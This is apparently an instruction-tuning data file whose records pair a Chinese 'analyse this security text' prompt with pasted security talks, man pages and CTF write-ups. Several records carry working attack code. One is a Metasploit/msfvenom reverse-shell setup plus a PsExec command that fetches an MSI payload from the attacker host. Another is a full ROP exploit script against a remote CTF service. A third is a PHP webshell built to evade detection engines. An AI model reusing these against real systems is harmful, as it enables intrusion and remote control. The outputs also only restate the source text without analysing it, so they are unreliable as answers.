{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1021-002-win-基于白名单PsExec执行payload ## 来自ATT&CK的描述 攻击者可以使用服务器帐户阻止SMB使用有效帐户与远程网络共享进行交互然后攻击者可以以登录用户的身份执行操作 SMB是同一网络或域上Windows计算机的文件打印机和串行端口共享协议攻击者可以使用SMB与文件共享进行交互从而允许他们在整个网络中横向移动SMB的Linux和macOS实现通常使用Samba Windows系统具有隐藏的网络共享只有管理员才能访问它们并提供了远程文件复制和其他管理功能例如网络共享包括C$ADMIN$和IPC$攻击者可以将此技术与管理员级别的有效帐户结合使用以通过SMB远程访问网络系统使用远程过程调用RPC与系统进行交互传输文件以及通过远程执行来运行传输的二进制文件依赖于SMB/RPC上经过身份验证的会话的示例执行技术为计划任务/作业服务执行和Windows管理规范攻击者还可以使用NTLM哈希访问具有散列特定配置和补丁程序级别的系统上的管理员共享 ## 测试案例 微软于2006年7月收购sysinternals公司PsExec是SysinternalsSuite的小工具之一是一种轻量级的telnet替代品允许在其他系统上执行进程完成控制台应用程序的完全交互而无需手动安装客户端软件并且可以获得与控制台应用程序相当的完全交互性 微软官方文档 <https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec> 说明PsExec.exe没有默认安装在windows系统 补充说明在高版本操作系统中可以通过配置策略对进程命令行参数进行记录日志策略开启方法`本地计算机策略>计算机配置>管理模板>系统>审核进程创建>在过程创建事件中加入命令行>启用`同样也可以在不同版本操作系统中部署sysmon通过sysmon日志进行监控 ## 检测日志 windows 安全日志需要自行配置 ## 测试复现 ### 环境准备 攻击机Kali2019 靶机win7sysmon日志 ### 攻击分析 #### 配置MSF ```bash msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.126.146 lhost => 192.168.126.146 msf5 exploit(multi/handler) > set lport 4444 lport => 4444 msf5 exploit(multi/handler) > exploit ``` #### 生成payload ```bash msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.126.146 LPORT=4444 -f msi > shellcode.msi ``` #### 靶机执行 注意需要管理员权限 ```dos PsExec.exe -d -s msiexec.exe /q /i http://192.168.126.146/shellcode.msi ``` #### 反弹shell ```bash msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.126.146:4444 [*] Sending stage (180291 bytes) to 192.168.126.149 [*] Meterpreter session 1 opened (192.168.126.146:4444 -> 192.168.126.149:49371) at 2020-04-18 23:09:44 +0800 meterpreter > getuid Server username: NT AUTHORITY\\SYSTEM meterpreter > getpid Current pid: 2352 ``` ## 测试留痕 ```log windows 安全日志 EventID 4688 进程信息: 新进程 ID: 0xe84 新进程名: C:\\Users\\12306Br0\\Desktop\\PSTools\\PsExec.exe EventID 4688", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOver the Air Remote Code Execution on the DEF CON 27 Badge via NFMI Worlds first NFMI exploitation, sorta or OTARCEDC27NFMIOMGWTFBBQ Agenda 1. Introduction 2. Intro to the Badge 3. Buffer Overflow and Proof of Concept 4. NFMI Specs 5. Convert Analog Signal into Symbols 6. Convert Symbols to Bytes 7. Reverse Engineer CRC, Craft Packets 8. Remote Crash the Badge 9. Hacking NFMI Firmware 10. OTA RCE Demos Because Any Meeting without an Agenda is a Trap Introduction  Seth Kintigh  Hardware Security Development Lifecycle Engineer a Dell  Hobbyist programmer since 1987, learned cipher breaking from my grandma, mom was meteorologist and COBOL programmer, dad is an Electrical Engineer  WPI graduate  BS EE with minors in CS and Physics  MS EE with concentration in crypto and infosec  Started career as an EE, but shifted to network security in 2004  At home at low levels and layers Near Field Magnetic Inductance (NFMI)  Short range wireless physical layer that communicates by coupling a tight, low- power, non-propagating magnetic field between devices.  The concept is for a transmitter coil in one device to modulate a magnetic field which is measured by means of a receiver coil in another device. [1]  Not radio!  Radio waves (electromagnetic waves) decay at 1/r2  Magnetic fields decay at 1/r6  Very short range, 2m tops, 10s of cm badge to badge, a 1-2 cm in my experiments.  Short range makes it more secure  Low absorption by body tissue, unlike radio, good for a Body Area Network  More efficient than radio over short distances  Used in some hearing aids and some proximity cards as part of the NFC protocol 1: https://en.wikipedia.org/wiki/Near-field_magnetic_induction_communication 2: https://www.nxp.com/products/wireless/miglo/nfmi-radio-for-wireless-audio-and-data- streaming:NXH2261UK Almost No Information Available  Weird levels of secrecy for hearing aid tech (dreams of Apple earbuds?)  No data sheet (very weird)  No protocol info at all  No development kits  No samples  N", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPentesting ICS 101 By Arnaud SOULLIE Who am I? Arnaud soullié Senior security auditor Windows Active Directory Can a Windows AD be secured ? JSSI 2014 (French, sorry) SCADA (BHEU14, HIP15, BruCon, BSLV15, DC24) Wine tasting / Motorbike riding (were not going to talk about it today) Sorry for the French accent interests @arnaudsoullie LAB PREREQUISITE vm? KALI LINUX MODBUSPAL MBTGET PLCSCAN SNAP7  ADDITIONAL TOOLS PCAP SAMPLES SCRIPTS SKELETONS  SCRIPTS LAB http://tinyurl.com/dc24-ics101 Agenda Introduction to ICS wrong with ICS security ? Programming plcs Pentesting PLCs Capture the flag ! Securing ics 1h 1h30 1 2 3 4 5 6 1h30 DEFCON 24 ICS WORKSHOP ICS Introduction Where do we find Industrial Control Systems ? Manufacturing plants Food Power plants Building automation systems (AC/HVAC/..) Water treatment Pharmaceutical manufacturing Chemical plants But alsoswimming pools, building heating system, dams, etc. What is an Industrial Control System (ICS)? Group WAN Production management ERP server Corporate IT Corporate network Data Historian / Scada server Maintenance laptops Supervision consoles Supervision network / SCADA PLCs RTUs Production network ICS PLC Wireless industrial networks Corporate IS handle data  ICS handle interfaces data with physical world (cyber-physical systems) What about IoT / smart stuff ? Not in the scope of this training Fit the definition of  cyber-physical  systems  Cardio-meter for your smartphone   Smart  electrical plugs By the way,  smart  clearly isnt the right word http://weputachipinit.tumblr.com/ Evolution of ICS Started with electrical relays hard wired automation, no update possible Then moved to programmable electronics Then to IP-network enabled devices Now and future is more and more COTS ICS evolution timeline From 1700s : Industrial revolution 1900s : use of relays to control remote systems 1950s : use of punch paper tape to control machines 1960s : use of distributed control to control a plant 1969 : First PLCs 1973 : Modbu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 日志 --- ## 系统日志类型 日志默认存放位置`/var/log/` ```bash service auditd status # 查看日志服务是否开启 more /etc/rsyslog.conf # 查看日志配置情况 ``` ### /var/log 下的日志分类 以下是比较常用的几个日志文件: - `/var/log/message` : 核心系统日志文件包含系统启动引导系统运行状态和大部分错误信息等都会记录到这个文件因此这个日志是故障诊断的首要查看对象. - `/var/log/dmesg` : 核心启动日志系统启动时会在屏幕显示与硬件有关的信息这些信息会保存在这个文件里面. - `/var/log/auth.log` 或 `/var/log/secure` : 存储来自可插拔认证模块(PAM)的日志包括成功的登录失败的登录尝试和认证方式Ubuntu 和 Debian 在 `/var/log/auth.log` 中存储认证信息而 RedHat 和 CentOS 则在 /var/log/secure 中存储该信息 - `/var/log/spooler` : UUCP 和 news 设备相关的日志信息 - `/var/log/cron` : 与定时任务相关的日志信息 - `/var/log/maillog` : 记录每一个发送至系统或者从系统发出的邮件活动 - `/var/log/boot` : 系统引导日志 - `/var/log/wtmp` 和 `/var/run/utmp` : 由多个程序执行记录用户登录时间 - `/var/log/kern` : 存储内核的错误和警告数据这对于排除与定制内核相关的故障尤为实用 - `/var/log/btmp` : 记录错误登录日志,这个文件是二进制文件,可以使用 lastb 命令查看 - `/var/log/cups` : 记录打印信息的日志 - `/var/log/lastlog` : 记录系统中所有用户最后一次登录时间的日志这个文件是二进制文件可以使用 lastlog 命令查看 - `/var/log/rpmpkgs` : 记录系统中安装各 rpm 包列表信息 --- ### 内核及系统日志 这种日志由 syslog 统一管理根据其主配置文件 `/etc/syslog.conf` 中的设置决定将内核消息及各种系统程序消息记录到什么位置 用户日志这种日志数据用于记录 Linux 系统用户登录及退出系统的相关信息包括用户名登录的终端登录时间来源主机正在使用的进程操作等 程序日志有些应用程序运会选择自己来独立管理一份日志文件而不是交给 syslog 服务管理用于记录本程序运行过程中的各种事件信息由于这些程序只负责管理自己的日志文件因此不同的程序所使用的日志记录格式可能会存在极大差异 > 内核为2.6.18时候使用的是 syslog 服务 > 注: 内核为2.6.32以后 syslog 被命名为 rsyslog所以配置文件名称也不一样 通过查看 `/etc/rsyslog.conf` 可查看相关系统日志配置情况 message 日志一般内核及大多数系统消息都被记录到公共日志文件 `/var/log/messages` 中而其他一些程序消息被记录到不同的文件中日志消息还能够记录到特定的存储设备中或者直接向用户发送 secure 是应急中最常用的文件主要记录系统存取数据的文件如 POP3sshtelnetftp 等相关记录从日志中可看出系统服务是否遭受到安全威胁 #### syslogd syslogd 是大部分 Linux 发行版默认的日志守护进程是一个记录日志的服务子配置文件位于 /etc/syslog 或 /etc/syslogd默认配置文件为 /etc/syslog.conf 从架构来看这个服务下面有一系列的子服务例如 mailcron 等等这些子服务对外提供日志记录的功能当其它的程序或服务需要记录日志的时候就可以直接调用这些子服务将日志记录到指定的地方 我们编写的代码可以通过 syslog 的接口进行 logsyslog 会通过 socket 将 log 发送给 syslogdsyslogd 在获取到 log 后会对 log 进行处理然后根据用户配置将 log 保存到本地或者发送到其他服务器上去 最简单的用 `logger -t '[test]' \"test\"` 就可以直接日志记录到 message 里 用 python 记录 ```py import syslog syslog.syslog(\"hello\") ``` #### rsyslogd rsyslogd 是 syslogd 的升级版子配置文件位于 /etc/rsyslog.d默认配置文件为 /etc/rs", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCracking 400,000 Passwords Matt Weir Sudhir Aggarwal Florida State University Special Thanks: Dr. Sudhir Aggarwal Professor Breno de Medeiros National Institute of Justice National White Collar Crime Center My Research Assist Law Enforcement Develop better ways to model how people actually create passwords Investigate how we can make passwords more secure FORENSICS CRACKING PASSWORDS IM CRACKING PASSWORDS What Im going to try and avoid focusing on... Tools Trivia For Tools and Trivia... My Research Blog - http://www.reusablesec.blogspot.com Tools Page - http://sites.google.com/site/reusablesec/ And Certainly Not... OMG Passwords Suck! Users are stupid! Were all doomed! PW CRACKER The Main Goal What does a password cracking session look like? What steps go into cracking a password list? The Plan 1.Password Cracking Basics, (for the CISSPs out there) 2.Cracking the phpbb.com list 3.Cracking the webhostingtalk.com list 4.Breakout Room: Questions + Dealing with TrueCrypt, pass-phrases and non-standard passwords Password Cracking Basics Two Types of Password Cracking Online - The system is still operational - You may only be allowed a few guesses Offline - You grabbed the password hash - Computer forensics setting Cracking Passwords Step 1) Create a password guess Cracking Passwords Step 1) Create a password guess password123 Cracking Passwords password123 Step 2) Hash the Guess Cracking Passwords Step 2) Hash the Guess 52F8A73082B1290 Cracking Passwords 52F8A73082B1290 Step 3) Compare it against the target hash Cracking Passwords 52F8A73082B1290 Step 3) Compare it against the target hash 82503CA693453D1 = Cracking Passwords 52F8A73082B1290 Step 3) Compare it against the target hash 82503CA693453D1 = Cracking Passwords Step 1 ... again) Make another guess monkey123 Password Salts Salts are a value added to a password to make it harder to crack For example, you could add the username - MD5(bob+defcon) - 09f20200fe8131d1114581e916381d04 - MD5(tom+defcon) - b19263f7cadf7a03e", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n前言 继续分享一些 Webshell 的小tricks在正文开始之前先留2个问题可以先不看 pdf 也不要把代码拿 去运行用肉眼判断下面这2个 php 代码会输出什么原理以及在 Webshell 中运用写在 PDF 里面了 代码1 代码2 正文 这里应该也不用我揭晓答案了拿去运行一下应该都一目了然了上面提出的那2个代码均来自 php bug 我相信绝大部分人如果没遇到过此问题的话很有可能会判断错误 判断错误的人想法可能如下 问题一为什么代码一中变量 $a 只是将值拷贝给 $c 并没有进行引用传值但是 $c[0]=\"c\" 还是改 变了 $a[0]  问题二为什么代码二中 theFunction 参数不是引用传参但是在函数内部还是改变了全局变量 $array 的值 其实这个问题最早在20多年前就被开发者提出了 https://bugs.php.net/bug.php?id=6417 并且在后面 几年一直有开发者在 php-bug 和手册的 note 中提及 https://bugs.php.net/bug.php?id=6417 https://bugs.php.net/bug.php?id=7412 https://bugs.php.net/bug.php?id=15025 https://bugs.php.net/bug.php?id=20993 https://www.php.net/manual/zh/language.references.php <?php $a=array(\"a\",\"b\"); $b=&$a[0]; $c=$a; $c[0]=\"c\"; $c[1]=\"d\"; var_dump($a); //输出 ?> <?php function theFunction($array) { $array[0] = 2; } $array = array(1,2); $reference =&$array[0]; theFunction($array); var_dump($array); //输出 ?> 直到 php8 该问题还是依旧存在没有修复的原因是因为 PHP 官方不认为是一个 bug 并给出的解释 是 由于 PHP 内部工作的特殊性如果对数组的单个元素进行引用然后复制数组无论是通过赋值还是通 过函数调用中的值传递都会将引用复制为数组的一部分这意味着对任一数组中任何此类元素的更改 都将在另一个数组和其他引用中中重复即使数组具有不同的作用域例如一个是函数内部的参 数另一个是全局的在复制时没有引用的元素以及在复制数组后分配给其他元素的引用将正常 工作即独立于其他数组 为了验证上面的说法我们这里 xdebug_debug_zval 查看变量 a 和 c 的信息可以看到 $a[0] 和 $c[0] 被标为了 is_ref 也就是说它们是一个引用类型 为了更严谨一点这里通过 gdb 对 PHP 进行调试可以看到gdb中 $a[0] 和 $c[0] 也是被标为了 is_ref 并且都指向同一内存地址这也就验证了为什么修改 c[0] 也会导致 a[0] 改变 在Webshell中的运用 既然我们已经知道 PHP 在数组引用中有这么一个tricks那么能不能在 Webshell 中进行运用呢答案 是可以的 下面这个是我在阿里云比赛中提交的一个绕过样本后续也测试了长亭牧云和百度的引擎均能绕过 <?php $a=array(1 => \"A\"); $b=&$a[1]; $c=$a; $c[$_GET[\"mem\"]]=$_GET[\"cmd\"]; eval($a[1]); ?> 如果 Webshell 引擎的开发没有对该问题进行适配的话那么在后续的污点跟踪中会丢失相关的污 点因为从 PHP 代码层面解析出来的抽象语法树上来看变量 $c 只是对 $a 进行了一个值拷贝所以 引擎自然而然地 $c 不会被标成污点 思考 下面的代码又会输出什么呢 https://bugs.php.net/bug.php?id=29992 参考 https://www.php.net/manual/zh/language.references.php https://cloud.tencent.com/developer/article/1621153 https://bugs.php.net/bug.php?id=6417 https://bugs.php.net/bug.php?id=7412 https://bugs.php.net/bug.php?id=15025 https://bugs.php.net/bug.php?id=20993 https://bugs.php.net/bug.php?id=29992 <?php $array = array(1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSpyware Spyware Forensic With Forensic With Reversing and Static Analysis Reversing and Static Analysis PK PK TWCERT/CC TWCERT/CC 2 Abstract Abstract 目前危害個人機密資料系統安全的惡意程式以各種方 目前危害個人機密資料系統安全的惡意程式以各種方 式無孔不入的進入我們電腦當我們上網下載程式接 式無孔不入的進入我們電腦當我們上網下載程式接 收電子郵件等往往會遇到不知檔案是否為惡意程式但 收電子郵件等往往會遇到不知檔案是否為惡意程式但 防毒軟體也未出現警告的情況在這場我們會講解一些案 防毒軟體也未出現警告的情況在這場我們會講解一些案 例以及介紹靜動態分析未知程式的技巧 例以及介紹靜動態分析未知程式的技巧 About PK About PK TWCERT/CC-鑑識實務班講師 Mail: pk46(at)aptg.net 3 Outline Outline Computer Forensics Computer Forensics Why Why Spyware Spyware Forensics Forensics Reverse Code Engineering Reverse Code Engineering Anti Anti--Reversing Reversing Spyware Spyware Reversing Reversing Conclusion Conclusion 4 Computer Forensics Computer Forensics What is Computer Forensics What is Computer Forensics  Forensics Process Overview Forensics Process Overview 5 Computer Forensics Computer Forensics DEFINITION: DEFINITION: 電腦鑑識是一種運用專業的分析與調查技 電腦鑑識是一種運用專業的分析與調查技 術將可能成為證據的資料 術將可能成為證據的資料((又稱數位證據 又稱數位證據))進行收集鑑 進行收集鑑 別分析與保存的一個過程用以呈現於法院狹義的說 別分析與保存的一個過程用以呈現於法院狹義的說 就是從電腦安全事件發生後 就是從電腦安全事件發生後 所進行的一系列尋找數位證 所進行的一系列尋找數位證 據的活動 據的活動 數位證據為任何可能的資訊並能夠以二進位 數位證據為任何可能的資訊並能夠以二進位((數位 數位))的方 的方 式傳輸或儲存包括網路封包數位照片電子郵件 式傳輸或儲存包括網路封包數位照片電子郵件 記憶體資料等 記憶體資料等 6 Forensics Process Overview Forensics Process Overview Acquisition( Acquisition(收集 收集)) Live Data Collection (Volatile/Non- Volatile) Collecting Network-based Evidence Preservation( Preservation(保存 保存)) Forensics Duplication Evidence Handling (HashTag) Identification( Identification(鑑定 鑑定)) Forensic Analysis Investigation Windows/Unix System Analyzing Network Traffic Evaluation( Evaluation(評估 評估)) Forensic Intuition/Sense Presentation( Presentation(呈現 呈現)) Writing Computer Forensic Report DFWS,2002 7 Why Why Spyware Spyware Forensics Forensics Rogue Rogue Web Sites Web Sites Rogue Application Rogue Application Spyware Spyware Forensic Forensic 8 Rogue, Bad Guy Rogue, Bad Guy Rogue Rogue Web Sites Web Sites 哪裡有流氓網站有多流氓 你是否知道自己上的是流氓網站 Rogue Application Rogue Application 我的電腦怪怪的但是我又不知道發生了何事而我的防", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/python2 from cStringIO import StringIO from pwn import * def attack(connection): pathname = \"/home/warmup/flag\\x00\" buffer = StringIO() buffer.write(p32(0x0804811d)) # sys_read buffer.write(p32(0x080481b8)) # add esp, 0x30 ; ret buffer.write(p32(0)) # fd buffer.write(p32(0x08049000)) # buffer buffer.write(p32(len(pathname))) # size buffer.write(\"A\" * 0x24) buffer.write(p32(0x08048135)) # sys_write buffer.write(p32(0x080481b8)) # add esp, 0x30 ; ret buffer.write(p32(1)) # fd buffer.write(p32(0x08049000)) # buffer buffer.write(p32(constants.linux.i386.SYS_open)) # size buffer.write(\"A\" * 0x24) buffer.write(p32(0x08048122)) # syscall buffer.write(p32(0x080481b8)) # add esp, 0x30 ; ret buffer.write(p32(0x08049000)) # pathname buffer.write(p32(constants.linux.O_RDONLY)) # flags buffer.write(p32(0)) buffer.write(\"A\" * 0x24) buffer.write(p32(0x0804811d)) # sys_read buffer.write(p32(0x080481b8)) # add esp, 0x30 ; ret buffer.write(p32(3)) # fd buffer.write(p32(0x08049000)) # buffer buffer.write(p32(0x100)) # size buffer.write(\"A\" * 0x24) buffer.write(p32(0x08048135)) # sys_write buffer.write(p32(0x0804814d)) # sys_exit buffer.write(p32(1)) # fd buffer.write(p32(0x08049000)) # buffer buffer.write(p32(0x100)) # size exploit = buffer.getvalue() for offset in reversed(range(4, len(exploit), 0x10)): connection.recvuntil(\"Welcome to 0CTF 2016!\\n\") buffer = StringIO() buffer.write(\"A\" * 0x20) if offset == 4: buffer.write(exploit[: offset + 0x10]) else: buffer.write(p32(0x080480d8)) # start buffer.write(exploit[offset: offset + 0x10]) padding = 0x34 - buffer.tell() buffer.write(\"B\" * padding) connection.send(buffer.getvalue()) connection.send(pathname) leak = connection.recvall() print leak.encode(\"string_escape\") context.log_level = \"debug\" with remote(\"202.120.7.207\", 52608) as connection: #ith process([\"strace\", \"-i\", \"-o\", \"log\", \"./warmup\"]) as connection: attack(connection)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nsshd === openssh软件套件中的服务器守护进程 ## 补充说明 **sshd命令** 是openssh软件套件中的服务器守护进程 ### 语法 ```shell sshd(选项) ``` ### 选项 ```shell -4强制使用IPv4地址 -6强制使用IPv6地址 -D以后台守护进程方式运行服务器 -d调试模式 -e将错误发送到标准错误设备而不是将其发送到系统日志 -f指定服务器的配置文件 -g指定客户端登录时的过期时间如果在此期限内用户没有正确认证则服务器断开次客户端的连接 -h指定读取主机key文件 -issh以inetd方式运行 -o指定ssh的配置选项 -p静默模式没有任何信息写入日志 -t测试模式 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndigita security The Mouse is mightier than the sword WHOIS cybersecurity solutions for the macOS enterprise @patrickwardle synack digita nsa nasa Outline the targets (past) attacks mitigations full bypass weaponization digita security THE TARGETS 'tempting' UI components The Attacker's Conundrum keychain kexts keylogger firewalls } alert! many 'useful' actions (e.g. accessing the keychain, loading a kext, etc.) now generate an alert that (ideally) the user must explicitly interact with. #security The Goal avoid all together dismiss (via code) for alerts: $ ./dumpKeychain of course, Apple tries to prevent both these scenarios! ...more on this shortly ;) //query keychain logic ... //bypass // pseudo-code if(accessAlertWindow) { sendClick(); } dismiss alert via code?! \" \" The Targets the macOS keychain $ /usr/bin/security dump-keychain -d login.keychain keychain: \"~/Library/Keychains/login.keychain-db\" class: \"genp\" attributes: 0x00000007 <blob>=\"GitHub - https://api.github.com\" data: \"7257b03422bbab65f0e7d22be57c0b944a0ae45d9e\" private keys passwords certificates autofill data dumping keys } auth tokens Keychain Access.app app data access alerts (UI) as normal user! hunter2 The Targets 'Security & Privacy'  'Accessibility' \"Apps with access to the accessibility API are allowed to manipulate the UIs of other applications. This gives them the ability to inject events into other processes, and allows them do pretty much anything you can. They can also log all your keystrokes.\" -superuser.com UI events & manipulations keylogging! Accessibility Pane } The Targets \"User-Approved Kernel Extension Loading\" \"I got 99 Problems, but Little Snitch aint one!\" -Wardle/DefCon '16 \"macOS High Sierra introduces a new feature that requires user approval before loading new third-party kernel extensions\" -apple.com Technical Note TN2459: \"User-Approved Kext Loading\" -apple.com approval required \" \" The Targets Security Alerts/(3rd-party)Tools $ nc -l 1337 macOS firewall alert blockblock ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH MINGETTY 8 \"6 Apr 1996\" \"Debian-Local\" \"Linux Programmer's Manual\" .SH NAME mingetty \\- 控制台最小的 getty .SH 总览 SYNOPSIS .B mingetty [\\-\\-noclear] [\\-\\-nonewline] [\\-\\-noissue] [\\-\\-nohangup] [\\-\\-nohostname] [\\-\\-long\\-hostname] [\\-\\-loginprog=/bin/login] [\\-\\-nice=10] [\\-\\-delay=5] [\\-\\-chdir=/home] [\\-\\-chroot=/chroot] [\\-\\-autologin username] .I tty .PP .SH 描述 DESCRIPTION .B mingetty 是一个用于虚拟终端的最小的 getty不像 .BR agetty (8)  .B mingetty 不适于串行线我建议使用 .BR mgetty (8) 来替代 .PP .SH 选项 OPTIONS .TP .B \\-\\-noclear 在提示输入用户名之前不进行清屏操作 (通常屏幕被清除) .TP .B \\-\\-nonewline 不在向 \\fI/etc/issue\\fR 输出之前打印一个信行符 .TP .B \\-\\-noissue 不输出 /etc/issue. .TP .B \\-\\-nohangup 不调用 vhangup() 来禁止其他应用程序对此 tty 的写入 .TP .B \\-\\-nohostname 不在提示登录之前打印主机名 .TP .B \\-\\-long\\-hostname 默认情况下主机名只打印第一个句点符 (dot) 前面的部分允许这个选项之后将显示 gethostname() 得到的全文 .TP .B \\-\\-loginprog /bin/login 改变登录程序 .TP .B \\-\\-nice 10 调用 nice() 来改变优先级 .TP .B \\-\\-delay 5 启动 \\fBmingetty\\fR 之后睡眠这么多秒 .TP .B \\-\\-chdir /home 调用登录程序之前切换到这个目录 .TP .B \\-\\-chroot /chroot 调用 chroot() 以这个目录名作为参数 .TP .B \\-\\-autologin username 自动地以指定的用户登录不询问用户名和密码为此请检查 .B /bin/login 的 \\-f 选项 .PP .SH \"ISSUE ESCAPES\" .B mingetty 可以识别下列可以内置于 .I /etc/issue 文件中的 escape 序列 .IP \\fB\\ed\\fP 插入当前日期 (本地时间) .IP \\fB\\el\\fP 在 .B mingetty 运行的终端插入一行 .IP \\fB\\em\\fP 插入机器体系结构 (\\fIuname -m\\fR) .IP \\fB\\en\\fP 插入机器的网络节点主机名 (\\fIuname -n\\fR) .IP \\fB\\eo\\fP 插入域名 .IP \\fB\\er\\fP 插入操作系统发行版信息 (\\fIuname -r\\fR) .IP \\fB\\et\\fP 插入当前时间 (本地时间) .IP \\fB\\es\\fP 插入操作系统名称 .IP \\fB\\eu\\fP 以及 \\fB\\eU\\fP 插入当前已登录的用户数 \\\\U 插入 \"\\fIn\\fP users\"但是 \\\\u 只插入 \"\\fIn\\fP\" .IP \\fB\\ev\\fP 插入操作系统版本号 (\\fIuname -v\\fR) .PP .SH 范例 EXAMPLE \"\\fBLinux\\ eos\\ i386\\ #1\\ Tue\\ Mar\\ 19\\ 21:54:09\\ MET\\ 1996\\fP\" 是将 \"\\fB\\\\s\\ \\\\n\\ \\\\m\\ \\\\v\\fP\" 写入 .IR /etc/issue 产生的 .PP .SH 文件 FILES .IR /etc/issue , .IR /var/run/utmp . .PP .SH \"参见 SEE ALSO\" .BR mgetty (8), .BR agetty (8). .PP .SH 作者 AUTHOR 版权所有 1996 Florian La Roche <laroche@redhat.com> David Frey <David.Frey@eos.lugs.ch> 和 Florian La Roche 书写了手册页 .SH \"[中文版维护人]\" .B 所罗门 <solomen@email.com.cn> .SH \"[中文版最新更新]\" .B Nov 9 2000", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents The Journey Of Hunting In-The-Wild Windows LPE 0day Quan Jin DBAPPSecurity #BHUSA @BlackHatEvents Information Classification: General Who am I  Quan Jin (@jq0904)  Security Researcher at DBAPPSecurity  Member of  DBAPPSecurity Lieying Lab  DBAPPSecurity WeBin Lab  Interested in  Vulnerability discovery and exploiting  In-the-wild 0day hunting  Presented at  Bluehat Shanghai 2019  HITB2021AMS  37 CVE acknowledgments from Microsoft  2020~2022 MSRC Most Valuable Researcher #BHUSA @BlackHatEvents Information Classification: General Agenda  Motivation  Learn from history (and now)  One road leads to Rome  Results  The Story of CVE-2021-1732  The Story of CVE-2021-33739  The Story of a Patched 1day  Takeaways #BHUSA @BlackHatEvents Information Classification: General Agenda  Motivation  Learn from history (and now)  One road leads to Rome  Results  The Story of CVE-2021-1732  The Story of CVE-2021-33739  The Story of a Patched 1day  Takeaways #BHUSA @BlackHatEvents Information Classification: General Motivation 2 4 6 5 11 0 2 4 6 8 10 12 2017 2018 2019 2020 2021 In-The-Wild Windows LPE 0day (2017-2021) #BHUSA @BlackHatEvents Information Classification: General  How to obtain valueable datasets (that potentially have 0days)  Private datasets (Data from our own products)  Public platform datasets (Such as VirusTotal)  How to develop an effective detection method  Dynamic detection (picking out a sample through abnormal behavior)  Antivirus, Sandbox,   Static detection (matching samples with static signatures)  YARA,  Is it possible to catch an itw LPE 0day? #BHUSA @BlackHatEvents Information Classification: General Agenda  Motivation  Learn from history (and now)  One road leads to Rome  Results  The Story of CVE-2021-1732  The Story of CVE-2021-33739  The Story of a Patched 1day  Takeaways #BHUSA @BlackHatEvents Information Classification: General Why should we learn from history 1. Some exploit techniques are consistent over time 2. Thinking from th", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefending Networks with Incomplete Information: A Machine Learning Approach Alexandre Pinto alexcp@mlsecproject.org @alexcpsec @MLSecProject  Security Monitoring: We are doing it wrong  Machine Learning and the Robot Uprising  More attacks = more data = better defenses  Case study: Model to detect malicious agents  MLSec Project  Acknowledgments and thanks Agenda  12 years in Information Security, done a little bit of everything.  Past 7 or so years leading security consultancy and monitoring teams in Brazil, London and the US.  If there is any way a SIEM can hurt you, it did to me.  Researching machine learning and data science in general for the past year or so. Active competitor in Kaggle machine learning competitions. Whos this guy?  Logs, logs everywhere  Where?  Log management  SIEM solutions The Monitoring Problem  Why?  Compliance  Incident Response  Gartner Magic Quadrant for Security Information and Event Management 2013.  Organizations are failing at early breach detection, with more than 92% of breaches undetected by the breached organization  We continue to see large companies that are re-evaluating SIEM vendors to replace SIEM technology associated with partial, marginal or failed deployments.  Are these the right tools for the job? Monitoring / Log Management is Hard  SANS Eighth Annual 2012 Log and Event Management Survey Results (http://www.sans.org/reading_room/analysts_program/SortingThruNoise.pdf) Monitoring / Log Management is Hard  However, there are individuals who will do a good job  How many do you know?  DAM hard (ouch!) to find these capable professionals Not exclusively a tool problem  How many of these very qualified professionals will we need?  How many know/ will learn statistics, data analysis, data science? Next up: Big Data Technologies  How many of these very qualified professionals will we need?  How many know/ will learn statistics, data analysis, data science? Next up: Big Data Technologies We need an Army! Of ROBOTS!  Machine l", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Babyshells - Pwn (50 + 0)p, 65 solves > If you hold a babyshell close to your ear, you can hear a stack getting smashed In this task we were given three binaries and three corresponding `host:port` pairs to pwn. These binaries were in x86, ARM and MIPS architectures respectively, but they all were very simple. They had no NX, and jumped right into our supplied buffer. Googling \"$ARCH + shellcode\" and sending the result was enough to solve the challenge.", "category": "text_analysis", "source": "security_papers"}
